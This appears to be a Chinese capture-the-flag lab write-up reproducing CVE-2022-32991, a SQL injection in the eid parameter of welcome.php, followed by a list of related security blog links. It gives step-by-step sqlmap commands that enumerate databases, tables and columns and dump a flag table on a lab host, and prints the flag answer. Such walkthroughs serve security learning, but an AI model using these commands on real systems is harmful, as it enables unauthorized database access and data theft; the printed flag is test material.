春秋云境:CVE-2022-32991[漏洞复现]

从CVE官网查询该漏洞相关信息

该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞

则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数


开启靶机

先在页面正常注册、登录一个账号。密码随便填

进入了home目录,这里有三个话题可以选择开启

随便选择一个进行开启点击Start即可

进入后查看网页URL

可以看到这里的URL地址就出现了welcome.php和eid参数


使用自动化工具SQLMAP漏洞利用

爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch --dbs

拿到了四个数据库,继续选择ctf库进行爆表


爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf --tables

再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag --columns

最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump


flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}

相关推荐
可怜的Tom被玩弄于股掌之中2 小时前
BUUCTF——Nmap
网络·安全·web安全·网络安全
KALC4 小时前
告别“知识孤岛”:RAG赋能网络安全运营
人工智能·网络安全
落寞的魚丶4 小时前
2025 年九江市第二十三届中职学校技能大赛 (网络安全)赛项竞赛样题
网络安全·服务器配置·2025九江职业技能大赛·九江第23届技能大赛·中职网络安全
2501_915909065 小时前
开发日常中的抓包工具经验谈:Charles 抓包工具与其它选项对比
websocket·网络协议·tcp/ip·http·网络安全·https·udp
一口一个橘子5 小时前
[ctfshow web入门] web77
前端·web安全·网络安全
Johny_Zhao6 小时前
Vmware workstation安装部署微软SCCM服务系统
网络·人工智能·python·sql·网络安全·信息安全·微软·云计算·shell·系统运维·sccm
阿斯顿法国红酒快7 小时前
Windows系统安全加固
网络·windows·安全·网络安全·系统安全·ddos
一口一个橘子8 小时前
[ctfshow web入门] web118
前端·web安全·网络安全
2501_915909061 天前
我用 Appuploader绕过 Mac,成功把 iOS 应用上线了 App Store
websocket·网络协议·tcp/ip·http·网络安全·https·udp
DourPanda1 天前
polarctf-web-[rce1]
linux·网络协议·网络安全